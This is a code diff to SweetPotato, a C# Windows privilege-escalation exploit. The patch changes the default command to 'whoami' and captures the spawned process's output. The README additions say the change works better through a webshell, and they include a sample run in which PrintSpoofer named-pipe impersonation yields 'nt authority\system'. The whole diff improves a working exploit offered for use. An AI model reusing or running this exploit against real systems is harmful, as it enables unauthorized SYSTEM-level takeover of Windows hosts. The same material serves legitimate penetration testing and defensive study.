1. Modify README.md

Program.cs

@@ -22,7 +22,7 @@ static void Main(string[] args) {
             ExecutionMethod executionMethod = ExecutionMethod.Auto;
             PotatoAPI.Mode mode = PotatoAPI.Mode.PrintSpoofer;
             bool showHelp = false;
-            bool isBITSRequired = false;
+            bool isBITSRequired = false; 
 
             Console.WriteLine(
                 "SweetPotato by @_EthicalChaos_\n" +
@@ -37,7 +37,7 @@ static void Main(string[] args) {
                 .Add<string>("c=|clsid=", "CLSID (default BITS:\n4991D34B-80A1-4291-83B6-3328366B9097)", v => clsId = v)
                 .Add<ExecutionMethod>("m=|method=", "Auto,User,Thread (default Auto)", v => executionMethod = v)
                 .Add("p=|prog=", "Program to launch (default cmd.exe)", v => program = v)
-                .Add("a=|args=", "Arguments for program (default null)", v => programArgs = v)
+                .Add("a=|args=", "Arguments for program (default whoami)", v => programArgs = v)
                 .Add<PotatoAPI.Mode>("e=|exploit=", "Exploit mode\n[DCOM|WinRM|EfsRpc|PrintSpoofer(default)] ", v => mode = v)
                 .Add<ushort>("l=|listenPort=", "COM server listen port (default 6666)", v => port = v)
                 .Add("h|help", "Display this help", v => showHelp = v != null);
@@ -151,6 +151,7 @@ static void Main(string[] args) {
                     CloseHandle(out_write);
                     byte[] buf = new byte[BUFSIZE];
                     int dwRead = 0;
+                    Console.WriteLine("execution output:");
                     while (ReadFile(out_read, buf, BUFSIZE, ref dwRead, IntPtr.Zero))
                     {
                         byte[] outBytes = new byte[dwRead];
@@ -160,10 +161,8 @@ static void Main(string[] args) {
                     CloseHandle(out_read);
                     Console.WriteLine("[+] Process created, enjoy!");
                 });
-
                 systemThread.Start();
                 systemThread.Join();
-
             } catch (Exception e) {
                 Console.WriteLine("[!] Failed to exploit COM: {0} ", e.Message);
                 Console.WriteLine(e.StackTrace.ToString());

README.md

@@ -11,9 +11,31 @@ SweetPotato by @_EthicalChaos_
                                4991D34B-80A1-4291-83B6-3328366B9097)
   -m, --method=VALUE         Auto,User,Thread (default Auto)
   -p, --prog=VALUE           Program to launch (default cmd.exe)
-  -a, --args=VALUE           Arguments for program (default null)
+  -a, --args=VALUE           Arguments for program (default whoami)
   -e, --exploit=VALUE        Exploit mode
                                [DCOM|WinRM|EfsRpc|PrintSpoofer(default)]
   -l, --listenPort=VALUE     COM server listen port (default 6666)
   -h, --help                 Display this help
 ```
++ NtApiDotNet embedded
++ execution output catching which will works better with webshell
++ Set default args to "whoami"
+
+```
+SweetPotato by @_EthicalChaos_
+  Orignal RottenPotato code and exploit by @foxglovesec
+  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
+  PrintSpoofer discovery and original exploit by @itm4n
+  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
+  Add NtApiDotNet embedded & execution output catching by Brian.W AKA BigCHAN
+
+[+] Attempting NP impersonation using method PrintSpoofer to launch c:\Windows\System32\cmd.exe
+[+] Triggering notification on evil PIPE \\az-yw-041/pipe/34dc3e02-4b7d-4b0b-a075-f87714a3798a
+[+] Server connected to our evil RPC pipe
+[+] Duplicated impersonation token ready for process creation
+[+] Intercepted and authenticated successfully, launching program
+[+] CreatePipe success
+[+] Command : "c:\Windows\System32\cmd.exe" /c whoami 
+execution output:
+nt authority\system
+```